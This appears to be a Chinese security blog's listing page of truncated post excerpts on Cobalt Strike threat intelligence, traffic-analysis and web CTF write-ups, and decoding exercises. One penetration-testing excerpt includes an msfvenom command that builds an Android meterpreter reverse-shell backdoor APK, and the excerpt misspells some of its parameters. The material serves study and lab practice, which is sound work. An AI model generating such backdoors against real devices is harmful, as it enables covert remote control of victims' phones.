Cobalt Strike 变体攻击

前言: EclecticIQ 研究人员发现了一个恶意网络服务器,该服务器很可能由中国威胁行为者运营,用于针对台湾政府实体,包括关键基础设施。 执行摘要 EclecticIQ 研究人员发现了一个恶意网络服务器,该服务器很可能由中国威胁行为者运营,用于针对台湾政府实体,包括关键基础设施。 命令和控制基础设施公开暴露在互联网上。根据在服务器上找到的日志和元数据,EclecticIQ 分析师高度...

发布于 信息安全

流量分析- 中国菜刀

0x01 系统工具 系统:MacOs 22.5.0 工具:wireshark、010Editor、CyberChef 0x02 实验目标 1.这是一种什么攻击(后门) 2.黑客可能利用的黑客工具 3.后门文件还原 4.后门文件的密码是多少 5.指令发送使用的是什么编码方式 6.传输的文件名叫什么 7.还原出传输的文件 8.文件中有个key,把它写出来,格式:key{}。 0x0...

发布于 攻防世界Web

流量分析-Q1

0x01 分析环境 系统:MAC OS windows 7 工具: charles wireshark sublime Text 0x01 分析目标 还原木马,信息获取 0x03 详细分析 数据包确认数据 2367 查看 10.2.7.101包里面响应数据 AL5THvvehvvvajyc,发现文件头信息为MZ,4D5A表示这是一个window 程序,dump到虚拟机中分析,查看进...

发布于 攻防世界Web

流量分析-Q4

0x01 涉及工具&实验目的 工具:wireshark,sublime Text,visualStudio,charles 实验目的:获取 flag 0x02 详细步骤 查看数据包长度,总共7053 使用charles 查看数据包,发现状态码为200的只有4条 结合wireshark分析,发现只有4条数据,我们右键添加mark标记 Mark后,返回首页->...

发布于 攻防世界Web

流量分析-用户身份证号

0x01 涉及工具&实验目的 工具:wireshark,sublime Text,CyberChef 实验目的:新增用户身份证号获取 0x02 详细步骤 分析方法 逐条数据分析,耗费时间 通过身份证字段分析 1.逐条数据分析 确认数据包数量:17184条 对数据进行筛选 Statistics->Conversations->Endpo...

发布于 攻防世界Web

攻防世界-web02

题目:小周将他小时候最心爱的玩具锁在了密码箱里,但由于时间久远,密码忘记了一部分,你能帮帮他吗? 靶机: http://47.94.14.162:10008/?password=ISCC%7B4%7D&password2=5 分析 F12查看源码看到style="display:none",去掉display:none可以看到密码箱信息 根据题目提示但由于...

发布于 攻防世界Web

攻防世界-web01

实验目的: 本CTF题考查对cookie的理解,通过篡改伪造用户凭证,从而获得管理员权限并读取敏感信息(key)。通过上述实验内容,增进对OWASP TOP10漏洞之一的“失效的访问控制”(Broken Access)漏洞原理的理解。 系统环境: Mac 13.3.1 (a) (22E772610a) 实验工具: burpSuite FireFox 实验步骤和内容 目标...

发布于 攻防世界Web

解码小练习

解码小练习1 ZmxhZzR7OWNiOTExMTd9 Base64格式 flag4{9cb91117} 解码小练习2: %66%6c%61%67%7b%55%52%4c%20%65%6e%63%6f%64%69%6e%67%2f%66%6c%61%67%2e%70%68%70%7d URL格式 flag{URL encoding/flag.php&#...

发布于 加解密

Saber-Web

实验1:使用Burp拦截并查看访问 http://124.70.71.251:47392/ 的HTTP请求包。 实验2:手动修改浏览器标识User-Agent 先访问 http://ip.tool.chinaz.com Burp开启拦截 刷新页面 拦截到了请求包 找到User-Agent字段,进行修改 Mozilla/5.0 (Linux; Android 1...

发布于 攻防世界Web

渗透实验基础

使用MSFVENOM生成后门 msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.189.184 LPORTS=4444 >1.apk LHOTS = 攻击源主机IP LPORTS = 默认端口号 后门漏洞 -l─# msfvenom -p android/meterpreter/reverse_tcp LHOST=1...

发布于 渗透测试
12347